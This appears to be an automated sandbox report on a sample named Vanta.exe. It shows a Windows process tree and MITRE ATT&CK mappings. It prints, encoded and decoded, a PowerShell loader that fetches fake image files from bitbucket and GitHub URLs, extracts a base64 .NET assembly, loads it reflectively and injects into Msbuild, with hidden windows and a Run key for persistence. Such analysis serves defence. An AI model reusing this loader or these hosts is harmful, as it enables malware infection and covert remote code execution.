  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff9df5dcc40,0x7ff9df5dcc4c,0x7ff9df5dcc58
  2⤵
  PID:4908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=1988 /prefetch:2
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1888,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  PID:3200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=2388 /prefetch:8
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3132 /prefetch:1
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4460 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4724,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  PID:1660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4664,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4876 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5172 /prefetch:8
  2⤵
  PID:2132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5324,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5360 /prefetch:8
  2⤵
  PID:552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3280,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4636,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4504 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5068,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4468 /prefetch:1
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5604,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5384 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5540,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6060,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:1132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4512,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5364,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:3756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5572,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:3352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5476,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5956 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6396,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  PID:2520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1076,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6192,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4532,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6492 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5492,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6312,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6604 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5892,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6228 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6252,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=4476 /prefetch:8
  2⤵
  PID:2888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6728,i,1269229687471777173,15608336811972733663,262144 --variations-seed-version=20241210-050121.637000 --mojo-platform-channel-handle=6744 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:2508

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:760

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x16c 0x494
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2780

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1028

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Vanta\" -spe -an -ai#7zMap29982:72:7zEvent27125
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:4056

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Vanta\" -spe -an -ai#7zMap20736:72:7zEvent17112
1⤵
- Suspicious use of FindShellTrayWindow
PID:4000

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap16328:64:7zEvent21011 -tzip -seml. -sae -- "Vanta.zip"
1⤵
- Suspicious use of FindShellTrayWindow
PID:3440

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap9887:64:7zEvent3303 -tzip -sae -- "C:\Users\Admin\Downloads\Vanta.zip"
1⤵
- Suspicious use of FindShellTrayWindow
PID:4056

C:\Users\Admin\Downloads\Vanta\Vanta.exe
"C:\Users\Admin\Downloads\Vanta\Vanta.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 67609fa5774e6.vbs
  2⤵
  - Checks computer location settings
  PID:3440
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67609fa5774e6.vbs"
    3⤵
    - Checks computer location settings
    PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBt$Gk$bQBw$G8$SQBt$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBz$GY$dwBx$GU$cQB3$C8$d$B3$HE$ZQB3$HE$ZQ$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.mimpoIm/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4876
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:4392
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

